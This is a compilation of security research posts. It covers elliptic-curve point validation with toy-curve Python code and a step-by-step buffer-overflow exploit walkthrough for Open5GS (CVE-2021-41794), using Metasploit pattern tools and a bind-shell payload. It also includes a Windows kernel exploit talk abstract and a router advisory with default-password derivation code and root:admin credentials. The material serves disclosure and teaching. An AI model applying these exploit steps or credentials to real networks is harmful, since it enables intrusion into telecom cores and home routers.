Implementations sometimes fail to properly distinguish the point at infinity, and this is where our third validation rule comes from:

Check that the point is not the point at infinity.

What can go wrong? Since multiplying the point at infinity by any scalar results in the point at infinity, an adversary may force the result of a key agreement to be zero if the legitimate recipient fails to check that the point received is not the point at infinity. This goes against the principle of contributory behavior, where some protocols require that both parties contribute to the outcome of an operation such as a key exchange. Failure to enforce this check may have additional negative consequences in other protocols.

Recall that the curve order, say $N$, corresponds to the number of points on the curve. To make matters more complicated, the group of points on an elliptic curve may be further divided into multiple subgroups. Lagrange’s theorem tells us that any subgroup of the group of points on the elliptic curve has an order dividing the order of the original group. Namely, the size (i.e. the number of points) of every subgroup divides the total number of points on the curve.

In cryptography, to ensure that the discrete logarithm problem is hard, curves are selected in such a way that they consist of one subgroup with large, prime order, say $n$, in which all computations are performed. Some curves (such as the NIST curves[9], or the curve secp256k1[10] used in Bitcoin) were carefully designed such that $n = N$, namely the prime order group in which we perform operations is the full group of points on the elliptic curve. In contrast, the popular Curve25519 has curve order $N = 8n$, which means that points on this curve can belong to the large prime-order subgroup of size $n$, or to a subgroup with a much smaller order, of size 2, 4 or 8, for example[11]. The value $h$ such that $h = N/n$ is called the cofactor; it can be thought of as the ratio between the total number of points on the curve and the size of the prime-order subgroup in which cryptographic operations are performed.

To illustrate this notion, consider the figure below in which we have further subdivided our fictitious set of elliptic curve points into two groups. When performing operations on elliptic curve points, we want to stick with operations on points in the larger, prime-order subgroup, identified by the blue points below.

And this is where our last validation rule comes from:

Check that the point is in the correct subgroup.

This can be achieved by checking that $nP = \mathcal{O}$. Indeed, a consequence of Lagrange’s theorem is that any group element multiplied by the order of that group is equal to the neutral element. If $P$ were in the small subgroup, multiplying it by $n$ would not equal $\mathcal{O}$. This highlights another possible check: one could also verify that $hP \neq \mathcal{O}$, which rules out points lying in a small subgroup. Contrary to the previous validation rules, this check is considerably more expensive since it requires a point multiplication, and as such is sometimes (detrimentally) skipped for efficiency purposes.

What can go wrong? A malicious party could send a point in the orange subgroup, for example as part of an ECDH key agreement protocol, causing the honest party to perform operations limited to that small subgroup. Thus, if the recipient of a public key failed to check that the point was in the correct subgroup, the attacker could perform a so-called small subgroup attack (also known as a subgroup confinement attack) and learn information about the legitimate party’s private key[12].
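The subgroup check and the leak it prevents can be illustrated on a toy curve. Everything in this sketch is an assumption made for illustration: the curve $y^2 = x^3 + x$ over the field of integers modulo 103 (chosen because it has $104 = 8 \cdot 13$ points, mirroring a cofactor of 8), the secret value, and the function names.

```python
# Toy curve y^2 = x^3 + x over F_103; it has 104 = 8 * 13 points (not secure).
P_MOD, A, B = 103, 1, 0
N, H = 13, 8          # prime subgroup order n and cofactor h
INF = None            # the point at infinity


def add(p1, p2):
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF    # P + (-P), which also covers doubling a point with y == 0
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD)
    else:
        lam = (y2 - y1) * pow((x2 - x1) % P_MOD, -1, P_MOD)
    x3 = (lam * lam - x1 - x2) % P_MOD
    y3 = (lam * (x1 - x3) - y1) % P_MOD
    return (x3, y3)


def mul(k, point):
    """Double-and-add scalar multiplication."""
    result = INF
    while k:
        if k & 1:
            result = add(result, point)
        point = add(point, point)
        k >>= 1
    return result


def in_prime_subgroup(point):
    """The last validation rule: reject infinity and require n * P == O."""
    return point is not INF and mul(N, point) is INF


points = [(x, y) for x in range(P_MOD) for y in range(P_MOD)
          if (y * y - (x ** 3 + A * x + B)) % P_MOD == 0]
assert len(points) + 1 == N * H   # affine points plus the point at infinity

good = next(mul(H, q) for q in points if mul(H, q) is not INF)                 # order 13
small = next(q for q in points if mul(H, q) is INF and mul(4, q) is not INF)   # order 8

print(in_prime_subgroup(good), in_prime_subgroup(small))   # True False

# Without the check, the victim's result depends only on secret mod 8,
# so eight guesses are enough to recover those bits of the secret.
secret = 45
leaked = mul(secret, small)
recovered = next(j for j in range(H) if mul(j, small) == leaked)
print(recovered == secret % H)   # True
```

On a real curve the attacker learns only a few bits per small subgroup, which is why the check matters most when the same private key is reused across many exchanges.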

Does that apply to all curves?

While the presentation above is fairly generic and applies in a general sense to all curves, some curves and associated constructions were created to prevent some of these issues by design.

NIST curves (e.g. P-256) and the Bitcoin curve (secp256k1)

These curves have a cofactor value of 1 (namely, $h = 1$). As such, there is only one large subgroup of prime order and all curve points belong to that group. Hence, once the first 3 steps in our validation procedure have been performed, the last step is superfluous.

Curve25519

Curve25519, proposed by Daniel J. Bernstein and specified in RFC 7748, is a popular curve which is notably used in TLS 1.3 for key agreement.

Although Curve25519 has a cofactor of 8, some functions using this curve were designed to prevent cofactor-related issues. For example, the X25519 function used to perform key agreement using Curve25519 mandates specific checks and performs key agreement using only $x$-coordinates, such that invalid curve attacks are avoided. Additionally, the governing RFC states in Section 5 that

Implementations MUST accept non-canonical values and process them as if they had been reduced modulo the field prime. The non-canonical values are 2^255 – 19 through 2^255 – 1 for X25519.

This seems to address most issues discussed in this post. However, there has been some debate[13] over the claimed optional nature of these checks.
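As a rough illustration of the input handling quoted above, the following sketch decodes an X25519 $u$-coordinate by ignoring the unused top bit and reducing modulo the field prime. The function name is hypothetical and the sketch covers only decoding, not the scalar multiplication itself.

```python
P25519 = 2**255 - 19


def decode_u_coordinate(u: bytes) -> int:
    """Decode a 32-byte little-endian u-coordinate the way X25519 inputs are processed."""
    if len(u) != 32:
        raise ValueError("X25519 u-coordinates are exactly 32 bytes")
    masked = bytearray(u)
    masked[-1] &= 0x7F                                  # ignore the unused most significant bit
    return int.from_bytes(masked, "little") % P25519    # non-canonical values are reduced


canonical = (9).to_bytes(32, "little")
non_canonical = (P25519 + 9).to_bytes(32, "little")     # same field element, different bytes
high_bit_set = (2**255 + 9).to_bytes(32, "little")

print(decode_u_coordinate(canonical)
      == decode_u_coordinate(non_canonical)
      == decode_u_coordinate(high_bit_set))             # True
```

Several distinct byte strings therefore map to the same field element, which is harmless for key agreement but worth remembering wherever encodings are compared for equality.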

With the popularity of Curve25519 and the desire for cryptographers to design more exotic protocols with it, the cofactor value of 8 resurfaced as a potential source of problems. Ristretto was designed as a solution to the cofactor pitfalls. Ristretto is an abstraction layer, on top of Curve25519, which essentially restricts curve points to a prime-order subgroup.

Double-Odd Elliptic Curves

Finally, a strong contender in the secure-by-design curve category is the Double-Odd family of elliptic curves, recently proposed by Thomas Pornin. These curves specify a strict and economical encoding, preventing issues with canonicalization and, even though their cofactor is not trivial, a prime order group is defined on them, similar in spirit to Ristretto’s approach, preventing subgroup confinement attacks.

Conclusion

With the ubiquitous use of elliptic curve cryptography, failure to validate elliptic curve points can be a critical issue which is sadly still commonly uncovered during cryptography reviews. While standards and academic publications provide ample directions to correctly validate curve points, implementations still frequently fail to follow these steps. For example, a vulnerability nicknamed Curveball was reported in January 2020, which allowed attackers to perform spoofing attacks in Microsoft Windows by crafting public points. Recently, we also uncovered a critical vulnerability in a number of open-source ECDSA libraries, in which the verification function failed to check that the signature was non-zero, allowing attackers to forge signatures on arbitrary messages; see the technical advisory Arbitrary Signature Forgery in Stark Bank ECDSA Libraries.

This illustrated guide will hopefully serve as an accessible reference on why and how point validation should be performed.

Thank you

The author would like to thank Eric Schorn and Giacomo Pope for their detailed review and helpful feedback.

References

1. Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Section 3.2.2.1 Elliptic Curve Public Key Validation Primitive.
2. NIST Special Publication 800-56A, Section 5.6.2.3.2 FFC Partial Public-Key Validation Routine and 5.6.2.3.3 ECC Full Public-Key Validation Routine.
3. That is, unless using an elliptic curve that was designed specifically to address these potential issues; we will come back to that at the end of this blog post.
4. Specifically, implementations may handle values that are larger than the field modulus in different ways. They may reject non-reduced values (i.e., non-canonical encodings), accept non-reduced values and reduce them modulo the prime order, or accept non-reduced values and discard the most significant bit(s). An interesting example happened with the cryptocurrency Zcash, where different implementations had distinct interpretations regarding the validity of curve points. Some details can be found in a blog post by Henry de Valence, as well as in a public report following a cryptography review performed by NCC Group.
5. Note that this figure does not represent an actual elliptic curve; it is just an arbitrary diagram designed for illustrative purposes.
6. Ingrid Biehl, Bernd Meyer and Volker Müller. “Differential Fault Attacks on Elliptic Curve Cryptosystems”. In: Advances in Cryptology – CRYPTO 2000, 20th Annual International Cryptology Conference, Santa Barbara, California, USA, August 20-24, 2000, Proceedings. 2000, pp. 131–146.
7. Note that there is a hybrid form starting with 0x06 or 0x07 defined in ANSI X9.62, but this format is very rarely used in practice.
8. Note that some curves and alternate point representations (for instance, when working in projective coordinates) may allow the point at infinity to have a well-defined representation.
9. Standardized in FIPS PUB 186-4: Digital Signature Standard (DSS).
10. Standardized in SEC 2: Recommended Elliptic Curve Domain Parameters.
11. The paper Taming the many EdDSAs provides some very interesting discussions around ambiguities in the Ed25519 signature verification equations (which is based on Curve25519). These ambiguities led to different interpretations of the validity of signatures, which resulted in implementations returning different validity results for some signatures, which could be critical in consensus-driven applications.
12. Chae Hoon Lim and Pil Joong Lee. “A Key Recovery Attack on Discrete Log-based Schemes Using a Prime Order Subgroup”. In: Advances in Cryptology – CRYPTO ’97, 17th Annual International Cryptology Conference, Santa Barbara, California, USA, August 17-21, 1997, Proceedings. 1997, pp. 249–263.
13. See https://moderncrypto.org/mail-archive/curves/2017/000896.html.

Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks

Following on from our previous blog post ‘The Challenges of Fuzzing 5G Protocols’, in this post, we demonstrate how an attacker could use the results from the fuzz testing to produce an exploit and potentially gain access to a 5G core network.

In this blog post we will be using the PFCP bug (CVE-2021-41794) we’d previously found using Fuzzowski 5GC in Open5GS[1] (present from versions 1.0.0 through 2.3.3), to demonstrate the potential security risk a buffer overflow can cause.

We will cover how to examine the bug for possible exploit, how to create the actual exploit code, and how it is integrated into a PFCP message.  Finally, we will discuss mitigations that can help reduce/eliminate this type of attack.

In this blog we have taken steps to simplify the process in an effort to make it available to a wider audience.  We have used a proof of concept to explain the techniques and turned off some of the standard mitigations to reduce the complexity of the exploit.

Background

Previously we used Fuzzowski 5GC to fuzz the UPF component of the Open5GS project (version 2.2.9).  The fuzz testing found a buffer overflow bug in the function ‘ogs_fqdn_parse’.  This type of bug is reasonably easy to exploit, and the basic idea is shown below.

We will use this bug to show how a malicious payload can be written to the variable ‘dnn’, the variable overflowed to set the return address, and execution gained to take control of the UPF process.

Test Environment

To make the exploit development easier and to keep the technical details as simple as possible, a few security mitigations were disabled:

• ASLR – Address Space Layout Randomization
• Stack protection
• Stack non-exec (NX)

Many systems run with insufficient mitigations, so testing exploitation in this context makes sense for showing how exploitation might be possible against one of these platforms. Furthermore, most of these mitigations can be bypassed given the right bug conditions. Although we didn’t investigate bypassing these mitigations for this research, it may be possible that certain manifestations of the bug allow for exploitation on a more hardened platform.

The following environments and tools were used to test and develop the exploit:

• Open5GS version 2.2.9 – The target
• Ubuntu 20.04 VM – Host for Open5GS
• Kali Linux 2021.1 VM – Tools for exploit development
• MsfVenom – Metasploit standalone payload generator
• Msf-pattern_create – Unique string pattern generator
• Msf-pattern_offset – Finds substring in string generated by msf-pattern_create
• GDB Debugger – For examining the execution
• Visual Code – Source code editor
• Netcat – To test the exploit

In the past low-level knowledge of assembler was often required to write the exploit, but with the advent of tools such as MsfVenom, generating exploit code is now ridiculously easy. However, there are still instances where custom shell code is required to develop a working exploit, for example if space is limited.

Where to Start?

First, we need to find exactly where the buffer overflow occurs and why.  This stage has already been covered so please refer to the previous blog post ‘The Challenges of Fuzzing 5G Protocols’ for more details.

For a quick recap we have a buffer created on the stack called ‘dnn’ which is defined as 100 bytes long.

This buffer is passed into the function ‘ogs_fqdn_parse’ as a pointer along with the source data buffer (message->pdi.network_instance.data) containing the value of ‘internet’ which is 8 bytes long (message->pdi.network_instance.len).

When the ‘ogs_fqdn_parse’ function executes, the memcpy copies data from the source to the destination overflowing the destination buffer by 5 bytes in this example.  By reviewing the source code, we can see that we have control over the contents of the ‘src’ parameter and the ‘length’ parameter.  Also note that we have read beyond the end of the ‘src’ buffer which could be used to leak information, but that’s a different type of bug that we won’t explore here.

On examining the function ‘ogs_fqdn_parse’, it’s possible to see that we can write as much data as we like into the destination buffer.  The only issue we face when trying to insert assembly code is the insertion of ‘.’ character or the null termination byte after the memcpy at line 302 and 304 above.

So, although we can write as much data as we want, we are limited to how much code can be inserted if we want to keep this example as simple as possible.  As the variable ‘len’ is an unsigned byte the maximum number of bytes for assembly code is limited to 255 bytes.  We could of course write some custom assembly code to jump over the ‘.’ characters but this adds extra complication.
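The length-prefixed format can be modelled in a few lines. This is a simplified model of the behaviour described above, not the Open5GS source, and the function name is hypothetical. It also offers one plausible reading of the 5-byte figure mentioned earlier, which is an assumption rather than something stated in the post: if the raw string ‘internet’ arrives without a length prefix, its first byte ‘i’ (0x69 = 105) is taken as the length, and 105 is 5 more than the 100-byte ‘dnn’ buffer holds.

```python
DNN_SIZE = 100  # size of the 'dnn' stack buffer, as stated in the post


def fqdn_parse_model(src: bytes, length: int):
    """Return (copy_sizes, total_written) for the unchecked parse.

    copy_sizes holds the size of each copy that would be requested and
    total_written counts every byte that would land in the destination.
    """
    copy_sizes, written, i = [], 0, 0
    while True:
        label_len = src[i]          # one unsigned length byte: 0..255
        copy_sizes.append(label_len)
        i += 1 + label_len          # skip the length byte and the label
        written += label_len + 1    # label plus either '.' or the final NUL
        if i >= length:
            return copy_sizes, written


# Well-formed input: a length byte followed by the label.
print(fqdn_parse_model(b"\x08internet", 9))   # ([8], 9)

# Raw input without a length byte: 'i' is interpreted as the length.
sizes, total = fqdn_parse_model(b"internet", 8)
print(sizes[0], sizes[0] - DNN_SIZE)          # 105 5
```

Because each length is a single byte, no individual copy can exceed 255 bytes, but nothing in the model limits how many copies are made or checks them against the destination size.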

Before rushing off to code our exploit, it is always worth looking at the other places this function is used as there may be a better opportunity to exploit the bug.  So let’s search the source code for other calls to ‘ogs_fqdn_parse’.

As we can see this function is used by several other components in the 5G core which could also be potential targets.  This opens up the attack vectors as we now have potentially multiple 5G core components that can be exploited in a similar fashion.  While the fuzzer only found a single bug in one component (in this case the UPF), examining the code shows that other components such as the AMF, MME, SMF, SGWC may be susceptible to the same issue.  This also highlights that fuzz testing alone will not necessarily find all vulnerabilities: in this example we also fuzzed the AMF and MME but failed to discover the same bug.

It is worth pointing out that some of these other calls are not exploitable due to size checks before the call to ‘ogs_fqdn_parse’.  For example, in the function ‘ogs_nas_5gs_decode_dnn’ shown in the following code, the size of the input data is checked against the size of the data structure ‘ogs_nas_dnn_t’ on line 122 below.  This prevents the function ‘ogs_fqdn_parse’ from being called if the input data is larger than the destination structure, which prevents the stack from being corrupted.

For our example exploit we will continue to use the original location of the buffer overflow discovered by our fuzzer: the function ‘ogs_pfcp_handle_create_pdr’, which is called when the UPF processes a PFCP Session Establishment Request message.

Proof of Concept

To demonstrate the exploit, it is easier to create a simple test program before attempting to exploit the actual component where the stack may be more complicated.

The code below shows a simple test program structured similarly to how the function is called in the actual UPF application.  Initially we want to determine the offset on the stack of the function return address for the function ‘test’ in our example.

This simple test program creates a variable ‘dnn’ on the stack along with a unique string of characters for the ‘name’ variable.  The function ‘ogs_fqdn_parse’ is then called to cause the stack corruption and overwrite the return address of the ‘test’ function.  This should cause the test program to crash as the value written to the return address is unlikely to be a valid memory address.

Generating the data for the name variable is done by using the Metasploit Framework tool ‘pattern_create.rb’.  This generates a unique sequence of characters that can later be used to find the relevant offset for the return address.

Command to generate unique string of characters:
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

The function ‘ogs_fqdn_parse’ is expecting the data to start with a single byte indicating the length of the data to follow. To copy the 1000 bytes of data that has been generated onto the stack, we need to split it up and specify the relevant sizes in bytes.

Before we can run the program, we need to switch off ASLR (Address Space Layout Randomization).

$ sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"

Then enable unlimited file size for core files.

$ ulimit -c unlimited

If we compile the test application and run it, we get the following output:

$ cc -g test_stack.c -o test_stack

$ ./test_stack
dnn address: 0x7fffffffdfb0
zsh: segmentation fault (core dumped) ./test_stack

As expected, the program crashed because we wrote 1000 bytes of data over important stack variables required for normal program execution. The observant amongst you will have realized that we actually wrote 1010 bytes to the stack, but we will come back to that later.

So now we have run the test program and it has generated a core file, it’s now time to examine the crash and find the offset to the magic return address. We will now examine the core file using the debugger gdb. Using the following command let’s load the core file with gdb so we can examine it:

$ gdb ./test_stack --core=core

The following image shows the stack layout before the memcpy is executed.  Looking at the layout we should only need to write approximately 116 bytes to overwrite the return address, so writing 1000 bytes is a bit of overkill for the proof of concept.  However, the stack in the UPF may have more variables between the variable ‘dnn’ and the return address which may require us to write a reasonable amount of data to the stack before we reach the location of the return address we are trying to change.

All we need to do now is use another Metasploit Framework tool called ‘pattern_offset.rb’ to calculate the offset of the return address.  To do this we take the address stored in the saved RIP register associated with the function ‘test’ stack frame (i.e. 0x4131654130654139), and use it as the query parameter for ‘pattern_offset.rb’.

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 0x4131654130654139
[*] Exact match at offset 119

An exact match is found at offset 119. We need to be careful here as this is not the actual offset of the return address. 119 is the offset of part of our string from the beginning of our unique string. As mentioned earlier we actually wrote 1010 bytes to the stack, which we now need to consider when calculating the final offset of the return address.

We can check this by displaying the first 128 bytes of the stack variable ‘dnn’ in our example program. Using the following command in the debugger to show the contents of ‘dnn’:

(gdb) x/128bb dnn

Note there is a gap between the end of the ‘dnn’ variable and the frame pointer which is due to 16-byte alignment requirements.

Creating the Exploit

This is where in the good old days you would crack open the ‘64-IA-32 Architectures Software Developer Instruction Set Reference Manual[2]’ and start hand crafting some assembly code. Fortunately, these days the Metasploit Framework has made this task very simple indeed.

The Metasploit Framework tool ‘MsfVenom’ can generate a number of different payloads/exploits by simply providing a few command line options. We have chosen the payload ‘linux/x64/shell_bind_tcp’ which generates code to start a shell prompt when a connection is made to the specified port 5600. The option to append code to exit the program has also been included. The ‘-f’ option is used to generate C code.

As we can see from the output of ‘MsfVenom’, the payload is conveniently only 94 bytes long. This means that we can copy it directly to the stack without worrying about the ‘.’ or null character messing up our assembly code. If the payload was longer than 255 bytes (the maximum size of a chunk we can copy) we would need to write some custom assembly code to skip over the ‘.’ character that is inserted after each chunk of data is copied.
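The two size constraints discussed so far, the separator bytes that shift the return-address offset and the 255-byte chunk limit, come down to a little arithmetic. The sketch below assumes the 1000-byte pattern was split into chunks of 100 bytes. The post does not state the chunk size, so this is purely an assumption, although it does reproduce the 1010-byte figure. The function names are hypothetical.

```python
CHUNK = 100        # ASSUMPTION: the post does not state how the pattern was split
MAX_CHUNK = 255    # a chunk length is a single unsigned byte


def total_written(data_len: int, chunk: int = CHUNK) -> int:
    """Bytes written to the destination: the data, a '.' between chunks, and a final NUL."""
    n_chunks = -(-data_len // chunk)       # ceiling division
    return data_len + (n_chunks - 1) + 1


def dst_offset(pattern_offset: int, chunk: int = CHUNK) -> int:
    """Position in the destination of the pattern byte at pattern_offset.

    One '.' is written after every complete chunk that precedes it.
    """
    return pattern_offset + pattern_offset // chunk


print(total_written(1000))   # 1010
print(dst_offset(119))       # 120
print(94 <= MAX_CHUNK)       # True: a 94-byte payload fits in a single chunk
```

Under this assumption the pattern offset of 119 corresponds to byte 120 of the destination, because one separator has been written before it. A different chunk size would shift the result, so the value should be confirmed in the debugger as described above.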
If we now replace the unique ASCII string in our test program with the output from ‘MsfVenom’ and the return address, we should have a working exploit!

Exploiting the UPF Component

Now we have a working proof of concept we know our exploit works. All we need to do now is repeat the process of finding the return address when returning from the function ‘ogs_pfcp_handle_create_pdr’, calculate the offset of the ‘dnn’ buffer and finally create a suitable PFCP Session Establishment Request message to send the exploit to the UPF.

Sounds straightforward enough, however the reality is a little more complicated. To start with, the function ‘ogs_pfcp_handle_create_pdr’ is a bit more complicated than our simple ‘test’ function. From the point where we overflow the stack variable ‘dnn’, we need execution to continue until the end of the function ‘ogs_pfcp_handle_create_pdr’ for our exploit code to be executed. As there are several other function calls and variable assignments, we need these to complete without crashing the UPF.

The main problem we have is the variable ‘pdr’ which is a pointer on the stack. This will be overwritten when we overwrite the return address because it is at a higher address on the stack compared to the ‘dnn’ variable. To fix this we need to find the offset of the variable ‘pdr’ and assign it to something sensible when we overflow the variable ‘dnn’. We can use the Metasploit tools ‘pattern_create.rb’ and ‘pattern_offset.rb’ again to determine this offset. Once the variable ‘pdr’ has been fixed up, the function then executes to completion and returns, executing our exploit code. The value of ‘pdr’ is at a fixed offset in our example as we have disabled ASLR. This means that we can hard code the value in our exploit once we have calculated it.

To create the PFCP Session Establishment Request message we used Fuzzowski 5GC and set the Network Instance Information Element to contain our exploit code.
We then tested the exploit by using Fuzzowski 5GC to send the PFCP messages to the UPF. After successful testing of the exploit, we used the POC (Proof of Concept) feature of Fuzzowski 5GC to generate a standalone python exploit script. This saves a lot of time compared to hand crafting the messages and having to calculate nested length fields and checksums etc.

Below is a section of the PFCP Session Establishment Request message containing our exploit, the ‘pdr’ pointer fix and the return address.

Mitigations

To simplify this blog post and hopefully make it understandable to a wider audience, the standard mitigations that help prevent these kinds of bugs being exploited have been disabled. This enabled a much simpler exploit process to be followed, allowing us to demonstrate the potential damage that can be done by exploiting buffer overflows.

The following mitigations would make the demonstrated bug much harder, but not necessarily impossible, to exploit.

• ASLR – Address Space Layout Randomization
• Stack protection
• Stack execution prevention

ASLR – Address Space Layout Randomization

Randomizing the loading address of various parts of an application makes it difficult for an attacker to locate parts of the application they want to target. For example, most operating systems implement some form of ASLR which changes the address of things such as the stack, heap, and library modules. Generally, applications need to be compiled with support for ASLR.

Stack Protection

By enabling stack protection options during compilation of an application, extra code can be inserted before and after each function in an attempt to detect stack corruption within a function. This may prevent further exploitation to some degree, but it will cause the application to exit which is not necessarily desirable.

Stack Execution Prevention

By preventing the area of memory that contains the stack from being executable, the type of exploit demonstrated would not be possible.
There are however other techniques that can be used to circumvent this protection.

Other Mitigations

There are several other mitigations that could help prevent this type of bug in the first place. For example:

• Better functional/system testing
• Better coding standards/practices
• Use of more secure versions of functions to replace functions like memcpy
• Code reviews
• Use of static analysis tools
• Fuzz Testing
• Design with security in mind

The Bug Fix

In version 2.3.4 of Open5GS a fix was implemented for our original reported bug (CVE-2021-41794).

While this patch fixed the reported bug there are still issues with the function ‘ogs_fqdn_parse’.

As the ‘src’ buffer is effectively controlled by the attacker the above issues are possible depending upon how the function ‘ogs_fqdn_parse’ is called. If size checks have been done before calling the function, then it’s not so much of an issue, however it is asking for trouble to have the user of the function validating what’s passed in to prevent the buffer overflow. The current patch in version 2.3.4 is susceptible to the second issue of writing a null byte beyond the end of the destination buffer. This just highlights the importance of using all possible mitigations to avoid releasing vulnerable code in the first place.

The original PFCP bug (CVE-2021-41794) was concerned with the calculation of the ‘len’ variable at line 328 above, and its use in the memcpy at line 334 without being validated. The expectation was for the function ‘ogs_fqdn_parse’ to be completely rewritten instead of an ‘if’ statement being added to only fix the original bug. Although reading beyond the length of the ‘src’ variable requires a coding error in the calling function, the one byte buffer overflow can be caused by data passed in by an attacker.
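As a sketch of what validating inside the parser could look like, the model below checks every label against both the remaining source bytes and the destination capacity, including the byte needed for the separator or terminator. It is a Python illustration with a hypothetical function name, not the Open5GS patch and not a drop-in replacement for the C function.

```python
def fqdn_parse_checked(src: bytes, dst_size: int) -> bytes:
    """Parse length-prefixed labels, refusing anything that would not fit."""
    if not src:
        raise ValueError("empty input")
    out = bytearray()
    i = 0
    while i < len(src):
        label_len = src[i]
        i += 1
        if i + label_len > len(src):
            raise ValueError("label runs past the end of the source buffer")
        # The extra byte leaves room for the '.' separator or the final NUL.
        if len(out) + label_len + 1 > dst_size:
            raise ValueError("destination buffer too small")
        out += src[i:i + label_len]
        i += label_len
        out += b"." if i < len(src) else b"\x00"
    return bytes(out)


print(fqdn_parse_checked(b"\x08internet", 100))          # b'internet\x00'
print(fqdn_parse_checked(b"\x03www\x07example", 100))    # b'www.example\x00'
```

With both checks in place, the raw string ‘internet’ is rejected because its implied label length exceeds the source, and a 100-byte label is rejected for a 100-byte destination because the terminator would not fit. Callers then no longer need to validate sizes themselves.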
• 01/11/2021 – Notified Open5GS of issues (read beyond ‘src’ variable and one byte overflow to ‘dst’ variable)
• 06/11/2021 – Requested example packet to cause one byte overflow
• 09/11/2021 – Sent example python script and screenshot to demonstrate one byte overflow
• 15/11/2021 – Open5GS main branch patched

This will be fixed in Open5GS versions released after 2.3.6. However the solution of extending the buffers by one byte is not an ideal fix.

We hope this blog post has given you a high level technical insight into the dangers of a simple buffer overflow bug, and how it can potentially be exploited by an attacker!

Glossary

References

How to work with us on Commercial Telecommunications Security Testing

NCC Group has performed cybersecurity audits of telecommunications equipment for both small and large enterprises. We have experts in the telecommunications field and work with world-wide operators and vendors on securing their networks. NCC Group regularly undertake assessments of 3G/4G/5G networks as well as providing detailed threat assessments for clients. We have the consultant base who can look at the security threats in detail of your extended enterprise equipment, a mobile messaging platform or perhaps looking in detail at a vendor’s hardware. We work closely with all vendors and have extensive knowledge of each of the major vendor’s equipment.

NCC Group is at the forefront of 5G security working with network equipment manufacturers and operators alike. We have the skills and capability to secure your mobile network and provide unique insights into vulnerabilities and exploit vectors used by various attackers. Most recently, we placed first in the 5G Cyber Security Hack 2021 Ericsson challenge in Finland. NCC Group can offer proactive advice, security assurance, incident response services and consultancy services to help meet your security needs.
If you are an existing customer, please contact your account manager, otherwise please get in touch with our sales team.

POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides

Alex Plaskett presented “Pwning the Windows 10 Kernel with NTFS and WNF” at Power Of Community (POC) on the 11th of November 2021.

The abstract of the talk is as follows:

A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10).

With no access to the exploit or details of how it worked other than a vulnerability summary the following plan was enacted:

1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
4. Gain insight from this exploit which could be used to enable detection and response by defenders.

The talk covers the above key areas and provides a detailed walk through, moving from introducing the subject, all the way up to the knowledge which is needed for both offense and defence on modern Windows versions.

The slides for the talk can be downloaded as follows:

Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)

Victure’s WR1200 WiFi router, also sometimes referred to as AC1200, was found to have multiple vulnerabilities exposing its owners to potential intrusion in their local WiFi network and complete takeover of the device.
Three vulnerabilities were uncovered, with links to the associated technical advisories below:

CVE-2021-43283 is a common Remote Code Execution vulnerability which is frequently found in routers implementing a ping/trace feature through their web interface that relies on a call to the ping or trace command made to the underlying router OS. However, the more interesting vulnerabilities here are the two others, which can easily be chained together to go from opportunistic sniffing of WiFi networks to full compromise of the router:

• CVE-2021-43282 allows an attacker to easily guess the default WiFi WPA2 key (if it was not manually changed by the device owner), which in this case is the last 4 bytes of the router’s MAC address. This address is advertised by the access point and can be retrieved with a basic WiFi scan.
• CVE-2021-43284 allows any user on the local network to open an SSH connection to the router with the default root:admin credentials. Even if the user changes the default admin account password from the web interface, the password for the root account is not changed at the same time.

While NCC Group was able to get in contact with Victure’s support team and communicate these findings to them, those bugs were left unfixed. After giving Victure a reasonable amount of time to fix these findings, in accordance with NCC’s responsible disclosure policies, it was decided to publicly release the following advisories. The disclosure timeline can be found at the bottom of this page.
Technical Advisories:

Default WiFi Network Password Advertised by Victure WR1200 WiFi router MAC address (CVE-2021-43282)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43282
Severity: High 8.1 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the default password for the two WiFi networks is advertised to unauthenticated users within WiFi range.

Impact

The device default WiFi password for both 2.4GHz and 5GHz networks can be trivially guessed by an attacker within range of the WiFi network, allowing the attacker to gain complete access to these networks if the password has been left unchanged from its factory default.

Details

The device default WiFi password corresponds to the last 4 bytes of the MAC address of its 2.4GHz network interface controller (NIC). An attacker within scanning range of the WiFi network can thus scan for WiFi networks with the following command.

iwlist wlp1s0 scanning | egrep "Victure" -B 5
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=68/70  Signal level=-42 dBm
Encryption key:on
ESSID:"Victure-1CC5"
--
Channel:157
Frequency:5.785 GHz
Quality=49/70  Signal level=-61 dBm
Encryption key:on
ESSID:"Victure-1CC5-5G"

The attacker can then effectively guess the correct default password from the last 4 bytes of the MAC address 46:FD:1C:C5 -> password: 46fd1cc5
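
The derivation is simple enough to sketch in a few lines of Python. This is an illustration only: the function name `default_wifi_key` is ours, and the first two bytes of the example BSSID are placeholders, since the advisory only shows the last four bytes (46:FD:1C:C5).

```python
def default_wifi_key(bssid):
    """Return the default WPA2 key implied by a WR1200 2.4GHz BSSID.

    Per the advisory, the key is the last 4 bytes of the MAC address,
    written as lowercase hex without separators.
    """
    octets = bssid.replace("-", ":").split(":")
    if len(octets) != 6 or any(len(o) != 2 for o in octets):
        raise ValueError("not a MAC address: %r" % bssid)
    int("".join(octets), 16)  # raises ValueError on non-hex characters
    return "".join(octets[-4:]).lower()


if __name__ == "__main__":
    # "00:11" is a made-up prefix; only 46:FD:1C:C5 comes from the advisory.
    print(default_wifi_key("00:11:46:FD:1C:C5"))
```

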